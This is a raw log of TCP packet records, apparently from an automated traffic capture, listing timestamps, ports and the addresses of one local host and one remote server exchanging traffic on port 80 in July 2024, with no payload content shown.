Jul 1, 2024 13:02:12.566042900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.566101074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.567090034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.567142963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.567166090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.567178965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.567217112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.567437887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.567485094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.570177078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.570228100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.570256948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.570269108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.570301056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.570310116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.570503950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.570544004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.573411942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.573440075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.573451996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.573467970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.573478937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.573498011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.573642015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.573684931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.574827909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.574871063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.574897051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.574938059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.575031042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.575041056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.575071096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.575089931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.578200102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.578212976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.578223944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.578255892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.578300953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.578375101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.578418016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.586577892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.586643934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.586668968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.586680889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.586708069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.586725950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.586860895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.586901903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.588331938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.588370085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.588381052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.588392973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.588413000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.588536978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.588556051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.588576078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.588602066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.591103077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.591130018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.591166973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.591176033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.591186047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.591227055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.591327906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.591340065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.591372013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.591392994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.592844009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.592906952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.592928886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.592941999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.592967987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.592984915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.593125105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.593164921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.595546007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.595591068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.595611095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.595624924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.595648050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.595664024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.595772982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.595813036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.597071886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.597116947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.597172022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.597184896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.597219944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.597228050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.597342014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.597388983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.599489927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.599543095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.599556923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.599569082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.599587917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.599605083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.599706888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.599749088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.601908922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.601969004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.602019072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.602030993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.602076054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.602158070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.602200031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.603353977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.603365898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.603379011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.603394032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.603423119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.603528976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.603570938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.605565071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.605619907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.605643988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.605654955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.605679989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.605700970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.605760098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.605770111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.605793953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.605813026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.606658936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.606702089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.606765032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.606776953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.606808901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.606821060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.606926918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.606966972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.609216928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.609268904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.609276056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.609287977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.609308004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.609325886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.609503984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.609566927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.610146999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.610198975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.610228062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.610240936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.610269070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.610289097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.610413074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.610459089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.611350060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.611392975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.611464977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.611476898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.611504078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.611521959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.611629963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.611668110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.612833023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.612878084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.612906933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.612920046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.612946033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.612963915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.613075972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.613114119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.613502979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.613543034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.613620043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.613632917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.613692045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.613739014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.613799095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615226984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615276098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615322113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615334988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615353107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615371943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615402937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615788937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615822077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615832090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615839005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615885973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615885973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.615951061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.615962029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.616002083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.617070913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.617115021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.617146015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.617156982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.617185116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.617202997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.617285013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.617300034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.617326975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.617336988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.618643999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.618690014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.618726969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.618738890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.618762970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.618782997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.618894100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.618931055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.619246960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.619291067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.619332075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.619344950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.619369030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.619388103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.619564056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.619630098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.620584011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.620634079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.620671034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.620683908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.620711088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.620732069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.620852947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.620903015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.621365070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.621412992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.621515989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.621530056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.621560097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.621582031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.621633053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.621669054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638034105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638053894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638067007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638093948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638109922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638156891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638176918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638190031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638197899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638210058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638219118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638247967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638797998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638812065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638823986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638835907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638844967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638851881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638864040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638873100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638881922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638890982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638901949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638906956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.638926029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.638943911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.661771059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.661809921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.661825895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.661858082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.661895037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.662009001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.662045956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.662121058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.662132025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.662149906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.662159920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.662167072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.662194967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.667987108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668055058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.668065071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668076992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668112993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.668323040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668332100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668342113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668353081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.668360949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.668404102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.672718048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.672780991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.672806025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.672817945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.672851086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.672991991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.673034906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.673120975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.673131943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.673145056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.673156023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.673173904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.673191071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.682877064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.682897091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.682909012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.682935953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.682951927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.683134079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.683146000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.683175087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.683193922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.683342934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.683355093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.683384895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.683393955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687442064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687494040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687515974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687527895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687551975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687568903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687707901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687750101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687825918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687838078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687849045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687859058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.687866926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687882900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.687907934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.691689014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.691757917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.691781044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.691797972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.691822052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.691839933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.691986084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.692028999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.692109108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.692121029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.692147017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.692157984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.692342997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.692383051 CEST	49705	80	192.168.2.5	147.45.78.162
